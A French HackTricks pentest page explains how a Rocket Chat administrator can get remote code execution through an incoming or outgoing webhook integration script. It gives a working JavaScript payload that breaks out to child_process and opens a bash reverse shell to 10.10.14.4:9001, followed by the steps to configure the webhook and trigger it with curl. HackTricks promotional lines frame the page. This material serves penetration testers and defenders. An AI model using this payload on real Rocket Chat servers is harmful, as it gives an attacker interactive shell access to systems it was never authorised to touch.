Rocket Chat

Apprenez le piratage AWS de zéro à héros avec htARTE (Expert Red Team AWS de HackTricks)!

Autres façons de soutenir HackTricks :

RCE

Si vous êtes administrateur dans Rocket Chat, vous pouvez obtenir une RCE.

  • Allez dans Integrations et sélectionnez Nouvelle intégration et choisissez n'importe laquelle : Webhook entrant ou Webhook sortant.

  • /admin/integrations/incoming

const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
  • Configurer le WebHook (le canal et le message en tant que nom d'utilisateur doivent exister):

  • Configurer le script WebHook:

  • Enregistrer les modifications

  • Obtenir l'URL du WebHook généré:

  • Appelez-le avec curl et vous devriez recevoir le shell inversé

Apprenez le piratage AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!

Autres façons de soutenir HackTricks:

Last updated